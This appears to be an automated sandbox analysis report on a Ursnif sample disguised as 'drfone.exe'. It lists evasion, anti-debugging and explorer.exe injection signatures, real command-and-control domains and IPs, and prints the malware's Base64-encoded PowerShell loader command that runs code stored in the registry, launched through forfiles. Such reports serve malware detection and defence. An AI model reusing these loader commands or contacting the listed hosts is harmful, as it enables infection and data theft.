Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4311
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520 Thread sleep count: 3545 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520 Thread sleep count: 4311 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Code function: 39_2_02DB2F10 FindFirstFileW,FindNextFileW,FindClose, 39_2_02DB2F10
Source: explorer.exe, 00000027.00000000.496908397.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000027.00000000.496865135.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000027.00000000.491848394.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000002.727521815.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000027.00000000.496865135.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000027.00000000.491848394.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000000.496699584.00000000082E2000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA+
Source: explorer.exe, 00000027.00000000.496699584.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000027.00000002.727521815.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000027.00000002.727521815.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000027.00000000.496699584.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000027.00000000.496908397.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000027.00000002.727521815.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000027.00000002.716897951.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_00000276DE088D78 CheckRemoteDebuggerPresent,NtSetInformationProcess, 32_2_00000276DE088D78
Checks if the current process is being debugged
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 45.142.215.100 187
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.0.cs Jump to dropped file
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded iex (gp 'HKCU:\Software\Solutionsys').D
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded iex (gp 'HKCU:\Software\Solutionsys').D
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\Desktop\drfone.exe Memory written: PID: 3440 base: 8B2B20 value: 00 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 8B2B20 value: 00
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\drfone.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 5056 72006500640069
Writes to foreign memory regions
Source: C:\Users\user\Desktop\drfone.exe Memory written: C:\Windows\explorer.exe base: 8B2B20 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 8B2B20
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\forfiles.exe forfiles /c 'cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA & exit' /p C:\Windows\system32 /s /m po*l.e*e
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBvAGwAdQB0AGkAbwBuAHMAeQBzACcAKQAuAEQA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xqhvpwja\xqhvpwja.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\r1g0ykja\r1g0ykja.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE3A5.tmp' 'c:\Users\user\AppData\Local\Temp\xqhvpwja\CSC8240488428EC4188955E47238990560.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF2B8.tmp' 'c:\Users\user\AppData\Local\Temp\r1g0ykja\CSC64F5131A8743441E92CD84029AD3C82.TMP'
Source: explorer.exe, 00000027.00000000.480943943.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000027.00000000.480626157.00000000008B8000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000027.00000000.480943943.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000027.00000000.480943943.0000000000EE0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\drfone.exe WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antispywareproduct

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.348748393.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430319768.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349342802.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348465665.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349241106.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348544234.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349447113.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349510962.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349495954.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348922196.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430336469.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348235899.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348681532.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349069504.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.504554057.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349393384.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348075019.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349414993.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430159099.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349162984.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396402042.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349022364.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348869581.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349465567.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389630441.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.416634770.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348813448.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.383185635.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349203884.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430074688.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348389706.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348613375.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348156130.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347990018.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349275689.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348315452.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.429874583.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347903589.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349306914.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349115327.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.403082199.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349368664.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348972194.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.348748393.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430319768.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349342802.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348465665.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349241106.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348544234.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349447113.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349510962.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349495954.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348922196.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430336469.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348235899.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348681532.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349069504.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.504554057.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349393384.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348075019.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349414993.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430159099.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349162984.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396402042.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349022364.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348869581.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349465567.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.389630441.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.416634770.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348813448.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.383185635.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349203884.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.430074688.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348389706.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348613375.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348156130.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347990018.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349275689.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348315452.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.429874583.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.347903589.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349306914.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349115327.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.403082199.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.349368664.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.348972194.0000000003780000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: drfone.exe PID: 7072, type: MEMORY
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 333865 Sample: drfone.exe Startdate: 24/12/2020 Architecture: WINDOWS Score: 100 68 Multi AV Scanner detection for submitted file 2->68 70 Yara detected  Ursnif 2->70 72 Sigma detected: Dot net compiler compiles file from suspicious location 2->72 74 6 other signatures 2->74 10 cmd.exe 2->10         started        12 drfone.exe 1 2->12         started        15 iexplore.exe 2 98 2->15         started        process3 signatures4 17 forfiles.exe 10->17         started        19 conhost.exe 10->19         started        86 Detected unpacking (changes PE section rights) 12->86 88 Detected unpacking (overwrites its own PE header) 12->88 90 Injects code into the Windows Explorer (explorer.exe) 12->90 92 5 other signatures 12->92 21 conhost.exe 12->21         started        23 iexplore.exe 29 15->23         started        26 iexplore.exe 28 15->26         started        28 iexplore.exe 27 15->28         started        30 6 other processes 15->30 process5 dnsIp6 32 cmd.exe 17->32         started        35 conhost.exe 17->35         started        62 hapynewyear.xyz 45.133.216.84, 443, 49729, 49730 CLOUDSOLUTIONSRU Russian Federation 23->62 process7 signatures8 66 Encrypted powershell cmdline option found 32->66 37 powershell.exe 32->37         started        process9 file10 54 C:\Users\user\AppData\...\xqhvpwja.cmdline, UTF-8 37->54 dropped 56 C:\Users\user\AppData\Local\...\r1g0ykja.0.cs, C++ 37->56 dropped 76 Injects code into the Windows Explorer (explorer.exe) 37->76 78 Sets debug register (to hijack the execution of another thread) 37->78 80 Writes to foreign memory regions 37->80 82 3 other signatures 37->82 41 explorer.exe 37->41 injected 45 csc.exe 37->45         started        48 csc.exe 37->48         started        signatures11 process12 dnsIp13 64 babsgans.website 45.142.215.100, 443, 49767, 49768 CLOUDSOLUTIONSRU Russian Federation 41->64 84 System process connects to network (likely due to code injection or exploit) 41->84 58 C:\Users\user\AppData\Local\...\xqhvpwja.dll, PE32 45->58 dropped 50 cvtres.exe 45->50         started        60 C:\Users\user\AppData\Local\...\r1g0ykja.dll, PE32 48->60 dropped 52 cvtres.exe 48->52         started        file14 signatures15 process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.133.216.84
unknown Russian Federation
202933 CLOUDSOLUTIONSRU false
45.142.215.100
unknown Russian Federation
202933 CLOUDSOLUTIONSRU true

Contacted Domains

Name IP Active
babsgans.website 45.142.215.100 true
hapynewyear.xyz 45.133.216.84 true